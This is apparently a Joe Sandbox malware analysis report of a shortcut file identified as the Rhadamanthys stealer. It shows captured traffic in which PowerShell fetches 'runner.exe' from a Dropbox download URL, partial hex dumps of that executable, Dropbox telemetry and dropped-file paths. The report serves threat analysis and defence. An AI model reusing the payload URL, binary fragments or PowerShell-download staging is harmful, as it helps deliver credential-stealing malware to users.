2024-12-19 12:44:45 UTC	522	IN	HTTP/1.1 200 OK Content-Type: text/javascript X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Server-Response-Time: 2 Date: Thu, 19 Dec 2024 12:44:44 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains X-Dropbox-Is-Upstream-Batch: true Content-Length: 0 Strict-Transport-Security: max-age=31536000; includeSubDomains Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 337da17dd1c741788e55fe157ae4b829 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:45 UTC	370	OUT	GET /cd/0/get/Cghd1jtLzGlJHKX-9xdPSYuTZVa37wT-hKvzNwSKnDfcuTKM7PpJ3fe1T3Rhm5pJVOamwDQ01obtQghBpb5sSp1qX3zxHKKcvFL8SbBiC1Bb6wiCWr5k1eO0o7hRyobnrH005C9TEHaeAXCntddfSkcf/file?dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: uc80703d35970dc7916212c2d7a8.dl.dropboxusercontent.com Connection: Keep-Alive
2024-12-19 12:44:46 UTC	738	IN	HTTP/1.1 200 OK Content-Type: application/binary Accept-Ranges: bytes Cache-Control: max-age=60 Content-Disposition: attachment; filename="runner.exe"; filename*=UTF-8''runner.exe Content-Security-Policy: sandbox Etag: 1734611873193801d Pragma: public Referrer-Policy: no-referrer Vary: Origin X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Robots-Tag: noindex, nofollow, noimageindex X-Server-Response-Time: 209 X-Webkit-Csp: sandbox Date: Thu, 19 Dec 2024 12:44:46 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 2949120 X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: d8142d23fe5148e985a2e56ea7faa6ca Connection: close
2024-12-19 12:44:46 UTC	15646	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 15 0f d0 df 51 6e be 8c 51 6e be 8c 51 6e be 8c 1a 16 bd 8d 40 6e be 8c 1a 16 bb 8d 91 6e be 8c d1 15 ba 8d 43 6e be 8c d1 15 bd 8d 47 6e be 8c d1 15 bb 8d 0a 6e be 8c df 15 bb 8d 57 6e be 8c 1a 16 ba 8d 4b 6e be 8c 1a 16 b8 8d 50 6e be 8c 1a 16 bf 8d 4c 6e be 8c 51 6e bf 8c 71 6f be 8c df 15 b7 8d 0a 6e be 8c df 15 41 8c 50 6e be 8c 51 6e 29 8c 50 6e be 8c df 15 bc 8d 50 6e be Data Ascii: MZ@!L!This program cannot be run in DOS mode.$QnQnQn@nnCnGnnWnKnPnLnQnqonAPnQn)PnPn
2024-12-19 12:44:47 UTC	16384	IN	Data Raw: 8b e5 5d c3 e8 0a 4d 07 00 cc cc cc cc cc cc cc cc cc c2 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 10 76 49 00 64 a1 00 00 00 00 50 51 56 a1 14 40 4c 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 64 a1 2c 00 00 00 8b 08 a1 a0 9e 4c 00 3b 81 04 00 00 00 0f 8e 4d 01 00 00 68 a0 9e 4c 00 e8 63 54 06 00 83 c4 04 83 3d a0 9e 4c 00 ff 0f 85 33 01 00 00 6a 40 6a 00 68 60 9e 4c 00 c7 45 fc 00 00 00 00 e8 04 72 06 00 83 c4 0c c7 05 64 9e 4c 00 00 00 00 00 c7 05 68 9e 4c 00 00 00 00 00 6a 2c e8 0e 50 06 00 83 c4 04 89 00 89 40 04 89 40 08 66 c7 40 0c 01 01 a3 64 9e 4c 00 c6 45 fc 01 b9 70 9e 4c 00 6a 20 68 c8 fa 4a 00 c7 05 70 9e 4c 00 00 00 00 00 c7 05 80 9e 4c 00 00 00 00 00 c7 05 84 9e 4c 00 00 00 00 00 e8 4d d6 ff ff 33 c0 c7 05 88 9e 4c 00 00 00 Data Ascii: ]MUjhvIdPQV@L3PEdd,L;MhLcT=L3j@jh`LErdLhLj,P@@f@dLEpLj hJpLLLM3L
2024-12-19 12:44:47 UTC	738	IN	Data Raw: 07 00 00 00 66 89 8d cc fd ff ff 84 c0 0f 84 a0 03 00 00 0f 57 c0 89 8d f8 fc ff ff 66 0f d6 85 54 fd ff ff 89 8d 54 fd ff ff 89 8d 58 fd ff ff 89 8d 5c fd ff ff c6 45 fc 0d 6a 21 89 8d ec fc ff ff 89 8d 90 fd ff ff 89 8d a0 fd ff ff 89 8d a4 fd ff ff 8d 8d 90 fd ff ff 68 c8 09 4b 00 e8 de 96 ff ff 8d 85 ec fc ff ff c6 45 fc 0e 50 8d 85 f8 fc ff ff 8b cf 50 8d 85 90 fd ff ff 50 8d 85 d8 fd ff ff 50 e8 f7 a2 00 00 50 8d 8d 54 fd ff ff e8 bb 1b 00 00 8b 8d d8 fd ff ff 85 c9 74 58 8b 85 e0 fd ff ff 2b c1 c1 f8 02 8d 14 85 00 00 00 00 8b c1 81 fa 00 10 00 00 72 14 8b 48 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 ef 10 00 00 52 51 e8 12 10 06 00 83 c4 08 c7 85 d8 fd ff ff 00 00 00 00 c7 85 dc fd ff ff 00 00 00 00 c7 85 e0 fd ff ff 00 00 00 00 c6 45 fc 0d 8b 8d Data Ascii: fWfTTX\Ej!hKEPPPPPTtX+rH#+RQE
2024-12-19 12:44:47 UTC	16384	IN	Data Raw: 50 3b 8d b0 fd ff ff 74 0e e8 62 a9 ff ff 83 85 ac fd ff ff 18 eb 11 ff b5 ac fd ff ff 8d 8d a8 fd ff ff e8 58 a7 ff ff c6 45 fc 0d 8b 8d e0 fd ff ff 83 f9 08 72 35 8b 95 cc fd ff ff 8d 0c 4d 02 00 00 00 8b c2 81 f9 00 10 00 00 72 14 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 68 0e 00 00 51 52 e8 9f 0d 06 00 83 c4 08 83 85 ec fc ff ff 04 47 8b 8d 54 fd ff ff 3b bd f8 fc ff ff 0f 8c 0a fe ff ff c6 45 fc 0b 85 c9 0f 84 9a 00 00 00 8b 85 5c fd ff ff 8b 95 54 fd ff ff 2b c1 c1 f8 02 8d 0c 85 00 00 00 00 8b c2 81 f9 00 10 00 00 72 14 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 25 0e 00 00 51 52 e8 39 0d 06 00 eb 58 a1 88 8c 4c 00 85 c0 75 36 68 84 00 00 00 e8 f4 0c 06 00 8b f0 89 b5 e4 fd ff ff 68 84 00 00 00 6a 00 56 c6 45 fc 10 e8 b3 2e 06 00 83 c4 Data Ascii: P;tbXEr5MrP#+hQRGT;E\T+rP#+%QR9XLu6hhjVE.
2024-12-19 12:44:47 UTC	16155	IN	Data Raw: 50 51 56 57 a1 14 40 4c 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f9 89 7d f0 8b 75 08 8d 47 04 0f 57 c0 c7 07 a4 f8 49 00 50 66 0f d6 00 8d 46 04 50 e8 44 e1 05 00 83 c4 08 c7 45 fc 00 00 00 00 8d 4f 10 c7 07 b4 1b 4b 00 8b 46 0c 89 47 0c 8d 46 10 50 e8 c7 6a ff ff c7 07 c4 12 4b 00 8b c7 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 1d 81 49 00 64 a1 00 00 00 00 50 51 56 57 a1 14 40 4c 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f9 89 7d f0 8b 75 08 8d 47 04 0f 57 c0 c7 07 a4 f8 49 00 50 66 0f d6 00 8d 46 04 50 e8 b4 e0 05 00 83 c4 08 c7 45 fc 00 00 00 00 8d 4f 10 c7 07 b4 1b 4b 00 8b 46 0c 89 47 0c 8d 46 10 50 e8 37 6a ff ff c7 07 0c 1c 4b 00 8b c7 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b Data Ascii: PQVW@L3PEd}uGWIPfFPDEOKFGFPjKMdY_^]UjhIdPQVW@L3PEd}uGWIPfFPEOKFGFP7jKMdY_^
2024-12-19 12:44:47 UTC	16384	IN	Data Raw: 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 22 51 52 e8 d7 8e 05 00 83 c4 08 c7 06 88 0f 4b 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c3 e8 e0 8a 06 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 15 87 49 00 64 a1 00 00 00 00 50 83 ec 24 56 a1 14 40 4c 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 d8 89 75 d4 8d 4d dc 6a 37 68 28 19 4b 00 c7 45 dc 00 00 00 00 c7 45 ec 00 00 00 00 c7 45 f0 00 00 00 00 e8 ce a4 ff ff 0f 57 c0 c7 45 fc 00 00 00 00 66 0f d6 46 04 8d 45 dc c6 45 fc 01 50 8d 4e 10 c7 06 b4 1b 4b 00 c7 46 0c 00 00 00 00 e8 42 2b ff ff 8b 4d f0 c7 06 f0 1b 4b 00 83 f9 10 72 28 8b 55 dc 41 8b c2 81 f9 00 10 00 00 72 10 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 22 51 52 e8 f7 8d 05 00 83 c4 08 c7 06 dc 12 4b 00 Data Ascii: P#+w"QRKMdY^]UjhIdP$V@L3PEduuMj7h(KEEEWEfFEEPNKFB+MKr(UArP#+w"QRK
2024-12-19 12:44:47 UTC	16384	IN	Data Raw: 01 68 a8 f2 4a 00 8b 30 8b 40 04 89 85 28 fd ff ff e8 df e3 fe ff 8b 85 20 fd ff ff 8b d0 83 78 14 08 72 02 8b 10 8b ca 8d 41 02 89 85 24 fd ff ff 0f 1f 40 00 66 8b 01 83 c1 02 66 85 c0 75 f5 2b 8d 24 fd ff ff d1 f9 51 52 8d 4d c0 e8 a3 e3 fe ff 6a 02 68 ac f2 4a 00 8d 4d c0 e8 94 e3 fe ff 3b b5 28 fd ff ff 74 53 83 7e 14 08 8b d6 72 02 8b 16 8b c2 8d 48 02 89 8d 24 fd ff ff 0f 1f 80 00 00 00 00 66 8b 08 83 c0 02 66 85 c9 75 f5 2b 85 24 fd ff ff 8d 4d c0 d1 f8 50 52 e8 53 e3 fe ff 6a 01 68 b4 f2 4a 00 8d 4d c0 e8 44 e3 fe ff 83 c6 18 3b b5 28 fd ff ff 75 ad 33 c0 c7 45 d8 00 00 00 00 33 c9 89 45 e8 c7 45 ec 07 00 00 00 66 89 4d d8 8b 8d 20 fd ff ff 8d 55 d8 c6 45 fc 01 3b d1 74 19 83 79 14 08 8b c1 72 02 8b 01 ff 71 10 8d 4d d8 50 e8 e9 e1 fe ff 8b 45 e8 Data Ascii: hJ0@( xrA$@ffu+$QRMjhJM;(tS~rH$ffu+$MPRSjhJMD;(u3E3EEfM UE;tyrqMPE
2024-12-19 12:44:47 UTC	229	IN	Data Raw: a1 00 00 00 00 50 83 ec 48 a1 14 40 4c 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 5d 08 8d 4d e8 6a 00 89 5d ec e8 7c fc 04 00 c7 45 fc 00 00 00 00 8b 35 c4 9e 4c 00 a1 58 9e 4c 00 89 45 e0 85 f6 75 2f 56 8d 4d e4 e8 5a fc 04 00 39 35 c4 9e 4c 00 75 10 a1 68 7e 4c 00 40 a3 68 7e 4c 00 a3 c4 9e 4c 00 8d 4d e4 e8 92 fc 04 00 8b 35 c4 9e 4c 00 8b 4b 04 8d 1c b5 00 00 00 00 3b 71 0c 73 30 8b 41 08 8b 3c 03 85 ff 74 28 8d 4d e8 e8 6b fc 04 00 8b c7 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d f0 33 cd e8 fc 0d 05 00 8b e5 5d c3 33 ff 80 79 14 00 74 10 e8 cf fd 04 00 3b 70 0c 73 0a 8b 40 08 8b 3c 03 85 ff 75 be 8b 45 e0 85 c0 74 04 8b f8 eb b3 6a 08 e8 d8 0d 05 00 Data Ascii: PH@L3ESVWPEd]Mj]\|E5LXLEu/VMZ95Luh~L@h~LLM5LK;qs0A<t(MkMdY_^[M3]3yt;ps@<uEtj
2024-12-19 12:44:47 UTC	16384	IN	Data Raw: 8b f8 83 c4 04 89 7d e0 8b 45 ec 8b 40 04 85 c0 74 0c 8b 70 18 85 f6 75 0a 8d 70 1c eb 05 be ca 0c 4b 00 6a 00 8d 4d ac e8 9a fb 04 00 c7 45 b0 00 00 00 00 c6 45 b4 00 c7 45 b8 00 00 00 00 c6 45 bc 00 33 c0 c7 45 c0 00 00 00 00 66 89 45 c4 89 45 c8 66 89 45 cc 89 45 d0 88 45 d4 89 45 d8 88 45 dc c6 45 fc 08 85 f6 0f 84 e5 00 00 00 8d 45 ac 56 50 e8 3b fe 04 00 c7 47 04 00 00 00 00 c7 07 b8 06 4a 00 8d 45 ac c6 45 fc 09 50 e8 6c fe 04 00 8b 45 d8 83 c4 0c 85 c0 74 09 50 e8 df 09 06 00 83 c4 04 8b 45 d0 c7 45 d8 00 00 00 00 85 c0 74 09 50 e8 c8 09 06 00 83 c4 04 8b 45 c8 c7 45 d0 00 00 00 00 85 c0 74 09 50 e8 b1 09 06 00 83 c4 04 8b 45 c0 c7 45 c8 00 00 00 00 85 c0 74 09 50 e8 9a 09 06 00 83 c4 04 8b 45 b8 c7 45 c0 00 00 00 00 85 c0 74 09 50 e8 83 09 06 00 Data Ascii: }E@tpupKjMEEEE3EfEEfEEEEEEEVP;GJEEPlEtPEEtPEEtPEEtPEEtP
2024-12-19 12:44:47 UTC	16384	IN	Data Raw: 8b cf ff 15 d4 e2 49 00 8b cb ff d7 8b bd 74 ff ff ff 0f b7 c0 b9 ff ff 00 00 66 3b c8 74 09 c6 46 04 00 e9 0a ff ff ff c7 06 00 00 00 00 c6 46 04 01 e9 fb fe ff ff 85 c0 0f 85 a6 00 00 00 80 7e 04 00 75 07 8b ce e8 54 07 00 00 8b 85 68 ff ff ff 0f b7 5e 06 8b 00 8b 78 0c 8b cf ff 15 d4 e2 49 00 8b 8d 68 ff ff ff ff d7 66 3b d8 75 6f e8 70 2e 06 00 8b 8d 7c ff ff ff 8b 00 8a 00 88 01 41 8b 1e 89 8d 7c ff ff ff 85 db 74 47 8b 43 1c 83 38 00 74 1b 8b 4b 2c 8b 01 85 c0 7e 12 48 89 01 8b 4b 1c 8b 11 8d 42 02 89 01 0f b7 02 eb 14 8b 03 8b 78 1c 8b cf ff 15 d4 e2 49 00 8b cb ff d7 0f b7 c0 b9 ff ff 00 00 66 3b c8 74 06 c6 46 04 00 eb 0a c7 06 00 00 00 00 c6 46 04 01 8b bd 74 ff ff ff 83 bd 64 ff ff ff 00 0f 85 d9 00 00 00 80 7e 04 00 75 07 8b ce e8 a1 06 00 00 Data Ascii: Itf;tFF~uTh^xIhf;uop.\|A\|tGC8tK,~HKBxIf;tFFtd~u

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:49 UTC	773	OUT	POST /api/4505546831036416/envelope/?sentry_key=015d5ce7dd3142cd8fca094a50adbf69&sentry_version=7&sentry_client=sentry.javascript.browser%2F8.27.0 HTTP/1.1 Host: d.dropbox.com Connection: keep-alive Content-Length: 504 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://www.dropbox.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.dropbox.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-19 12:44:49 UTC	504	OUT	Data Raw: 7b 22 73 65 6e 74 5f 61 74 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 31 32 3a 34 34 3a 34 37 2e 37 39 34 5a 22 2c 22 73 64 6b 22 3a 7b 22 6e 61 6d 65 22 3a 22 73 65 6e 74 72 79 2e 6a 61 76 61 73 63 72 69 70 74 2e 62 72 6f 77 73 65 72 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 38 2e 32 37 2e 30 22 7d 7d 0a 7b 22 74 79 70 65 22 3a 22 73 65 73 73 69 6f 6e 22 7d 0a 7b 22 73 69 64 22 3a 22 34 30 31 66 39 32 61 37 30 62 30 30 34 32 39 31 62 62 30 34 35 37 38 39 31 31 66 36 32 32 35 37 22 2c 22 69 6e 69 74 22 3a 74 72 75 65 2c 22 73 74 61 72 74 65 64 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 31 32 3a 34 34 3a 34 37 2e 37 39 34 5a 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 31 32 3a 34 34 3a 34 37 2e 37 39 34 5a 22 2c 22 73 74 61 74 Data Ascii: {"sent_at":"2024-12-19T12:44:47.794Z","sdk":{"name":"sentry.javascript.browser","version":"8.27.0"}}{"type":"session"}{"sid":"401f92a70b004291bb04578911f62257","init":true,"started":"2024-12-19T12:44:47.794Z","timestamp":"2024-12-19T12:44:47.794Z","stat
2024-12-19 12:44:50 UTC	467	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-sentry-error,x-sentry-rate-limits,retry-after Content-Length: 2 Content-Type: application/json Cross-Origin-Resource-Policy: cross-origin Date: Thu, 19 Dec 2024 12:44:50 GMT Server: envoy Vary: origin,access-control-request-method,access-control-request-headers X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 68f6533929bb4b8e8548ec2900e19cc6 Connection: close
2024-12-19 12:44:50 UTC	2	IN	Data Raw: 7b 7d Data Ascii: {}

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CNUXJvLcgw.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Rhadamanthys

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_af1411e0-60b7-4355-9705-3d59f33d50eb\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD710.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7BD.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD80C.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0dd0bca1-b700-47bf-a37d-fdd918cac765.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1b040335-05e7-493b-bbcb-0ea5f1977337.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\57426db8-e870-4061-bb52-3928e92fbbb4.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7c29a309-55c0-409a-b3a2-8c3f2ef54ca3.tmp

Windows Analysis Report
CNUXJvLcgw.lnk

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:51 UTC	996	OUT	POST /2/client_metrics/record HTTP/1.1 Host: www.dropbox.com Connection: keep-alive Content-Length: 381 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-Type: application/json sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 x-dropbox-client-yaps-attribution: edison_atlasservlet.file_viewer-edison:prod sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.dropbox.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: same-origin Sec-Fetch-Dest: empty Referer: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: gvc=MzEwMjM3MzU2NTk3NjIwNDU2OTE5MDY3OTg3NjQ5NTA1MTQ4ODM4; t=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-js_csrf=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-ss=0FAEIkEix0; locale=en_GB
2024-12-19 12:44:51 UTC	381	OUT	Data Raw: 7b 22 73 63 6f 70 65 73 22 3a 5b 5d 2c 22 6b 6e 6f 77 6e 5f 6e 61 6d 65 73 70 61 63 65 73 22 3a 5b 5d 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 22 70 72 6f 64 22 2c 22 61 72 74 69 66 61 63 74 5f 6e 61 6d 65 22 3a 22 64 72 6f 70 62 6f 78 2d 77 65 62 22 2c 22 61 72 74 69 66 61 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 22 2c 22 63 6c 69 65 6e 74 5f 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 6c 69 65 6e 74 5f 76 65 72 73 69 6f 6e 22 3a 33 30 2c 22 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 22 3a 7b 22 2e 74 61 67 22 3a 22 74 79 70 65 73 63 72 69 70 74 22 7d 7d 2c 22 74 72 69 67 67 65 72 22 3a 7b 22 2e 74 61 67 22 3a 22 74 72 69 67 67 65 72 5f 68 Data Ascii: {"scopes":[],"known_namespaces":[],"environment":"prod","artifact_name":"dropbox-web","artifact_version":"0000000000000000000000000000000000000000","client_metadata":{"client_version":30,"implementation":{".tag":"typescript"}},"trigger":{".tag":"trigger_h
2024-12-19 12:44:51 UTC	595	IN	HTTP/1.1 200 OK Content-Disposition: attachment Content-Security-Policy: sandbox Content-Type: application/json Pragma: no-cache X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Frame-Options: sameorigin X-Server-Response-Time: 119 X-Webkit-Csp: sandbox Content-Length: 137 Date: Thu, 19 Dec 2024 12:44:51 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: bfc98a467a154bea876ebfb6642188ed Connection: close
2024-12-19 12:44:51 UTC	137	IN	Data Raw: 7b 22 64 65 62 75 67 5f 69 6e 66 6f 73 22 3a 5b 5d 2c 22 6d 61 78 5f 73 63 6f 70 65 73 5f 70 65 72 5f 72 65 71 75 65 73 74 22 3a 31 30 30 2c 22 70 75 62 6c 69 63 61 74 69 6f 6e 5f 69 6e 74 65 72 76 61 6c 5f 73 65 63 6f 6e 64 73 22 3a 36 30 2c 22 72 65 70 6f 72 74 69 6e 67 5f 63 6f 6e 66 69 67 73 22 3a 5b 5d 2c 22 73 74 6f 70 5f 70 75 62 6c 69 63 61 74 69 6f 6e 5f 66 6f 72 5f 73 65 63 6f 6e 64 73 22 3a 30 7d Data Ascii: {"debug_infos":[],"max_scopes_per_request":100,"publication_interval_seconds":60,"reporting_configs":[],"stop_publication_for_seconds":0}

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:51 UTC	937	OUT	POST /csp_log?policy_name=metaserver-whitelist HTTP/1.1 Host: www.dropbox.com Connection: keep-alive Content-Length: 3206 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: application/csp-report Accept: / Origin: https://www.dropbox.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: report Referer: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: gvc=MzEwMjM3MzU2NTk3NjIwNDU2OTE5MDY3OTg3NjQ5NTA1MTQ4ODM4; t=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-js_csrf=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-ss=0FAEIkEix0; locale=en_GB
2024-12-19 12:44:51 UTC	3206	OUT	Data Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 64 67 69 75 72 36 34 76 61 77 6d 64 78 39 61 6c 71 77 36 65 74 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 6b 64 75 68 71 72 6e 70 30 30 72 6a 34 34 72 6a 65 70 70 75 77 33 31 71 6b 26 64 6c 3d 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 6f 72 69 67 69 6e 61 6c 2d 70 6f 6c 69 63 79 22 3a 22 Data Ascii: {"csp-report":{"document-uri":"https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1","referrer":"","violated-directive":"script-src-elem","effective-directive":"script-src-elem","original-policy":"
2024-12-19 12:44:51 UTC	2923	IN	HTTP/1.1 204 No Content Content-Type: text/plain; charset=utf-8 Content-Disposition: attachment Content-Security-Policy: base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; default-src 'none' ; font-src https:// data: ; form-action 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-src https://* carousel: dbapi-6 [TRUNCATED] Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic ; script-src 'unsafe-eval' 'strict-dynamic' 'nonce-zae5FOaY4wgYj6/QMIGo' 'nonce-RftBflA1VBBHPll0Vn76' Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: __Host-logged-out-session=ChDPre50SfwbRtRglYkX1GzyEMOqkLsGGi5BTHlHQjJPRFBFZ0c5bEJMajJFVnBERE5URnVUQUJrdGRJMTZxUGM2TUVSb0pR; HttpOnly; Path=/; SameSite=None; Secure 